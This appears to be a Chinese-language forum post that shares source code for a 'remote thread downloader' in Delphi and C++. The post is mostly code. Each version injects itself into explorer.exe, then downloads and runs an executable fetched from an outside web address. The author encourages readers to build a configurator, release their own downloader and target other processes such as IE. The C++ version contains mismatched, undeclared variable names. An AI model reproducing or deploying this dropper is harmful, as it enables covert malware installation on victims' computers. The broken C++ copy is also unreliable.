Delphi线程注入下载
很久以前就听说远程线程注入方法很好不用另外写DLL~但是实现难度高
刚好拿到一份Aphex大哥的远程线程注入代码演示
代码:
感谢Aphex大哥提供Delphi版本的远程线程注入~方法
{
Remote Thread Downloader By Anskya
Email:Anskya@Gmail.com
Web:www.Anskya.Net
}
program Project1;
{$IMAGEBASE $13140000}
uses
Windows,Urlmon;
function Main(dwEntryPoint: Pointer): longword; stdcall;
begin
URLDownloadToFile(0, 'Http://Www.Anskya.Net/test.exe', 'c:test.exe', 0, 0);
WinExec('c:test.exe', SW_SHOW);
ExitProcess(0);
Result := 0;
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
Module := Pointer(GetModuleHandle(nil));
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew + SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
var
ProcessHandle, PID: longword;
begin
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @PID);//获取c的PID
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);//打开进程
Inject(ProcessHandle, @Main);//插入代码
CloseHandle(ProcessHandle);//关闭线程句柄
end.
C++代码是完全翻译Delphi的~呵呵·代码是先用Delphi写的~然后再翻译的~呵呵~
代码:
没有别的要注意的就是请注意大小写~~这个是用习惯Delphi然后用C++的最痛苦的事情
/*
Remote Thread Downloader By Anskya
Email:Anskya@Gmail.com
Web:www.Anskya.Net
*/
#pragma comment(linker,"/ENTRY:Entrypoint /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078")
#pragma comment(lib, "msvcrt.lib")
#pragma comment(lib, "urlmon.lib")
#include <windows.h>
unsigned long inject (void *)
{
URLDownloadToFile(0, "Http://Www.Anskya.Net/test.exe", "c:\test.exe", 0, 0);
WinExec("c:\test.exe", SW_SHOW);
ExitThread(0);
return 0;
}
void Entrypoint()
{
DWORD Size;
PBYTE module;
module = (PBYTE)GetModuleHandle(0);
Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage;
HWND windowhe;
HANDLE ProcessHandle;
DWORD PID;
LPVOID heart;
window = FindWindow("Shell_TrayWnd", NULL); //根据Explorer.exe的窗口类名查找PID
GetWindowThreadProcessId(window, &PID);
ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pidwin);
VirtualFreeEx(ProcessHandle, module, 0, MEM_RELEASE);
heart = VirtualAllocEx(ProcessHandle, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(ProcessHandle, m2, module, Size, NULL);
CreateRemoteThread(ProcessHandle, 0, 0, (unsigned long(__stdcall *)(void *))inject, module, 0, NULL);
}
大家写个配置器然后就可以发布自己的Downloader了~~如果想插入IE等进程
有窗口的就用WindowSPY查找窗口类名~然后获取PID
没有的话就自己写一个进程PID查找函数~
~~~~~~~~~~~~~~The_End~~~~~~~~~~~~~~~~转载请保留版权By Anskya
program fwb;
{$IMAGEBASE $13140000}
uses
Windows;
const
urls='http://www.Anskya.net/test.exe';
files='c:\ss.exe';
procedure Main; stdcall;
begin
LoadLibrary('urlmon.dll');
asm
push 0
push urls
push files
push 0
push 0
call URLDownloadToFileA
end;
WinExec(files,5);//SW_SHOW
ExitThread(0);
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
Module := Pointer(GetModuleHandle(nil));
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew + SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
var
ProcessHandle, PID: longword;
begin
GetWindowThreadProcessId(FindWindow('shell_traywnd', nil), @PID);
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Main);
CloseHandle(ProcessHandle);
end.
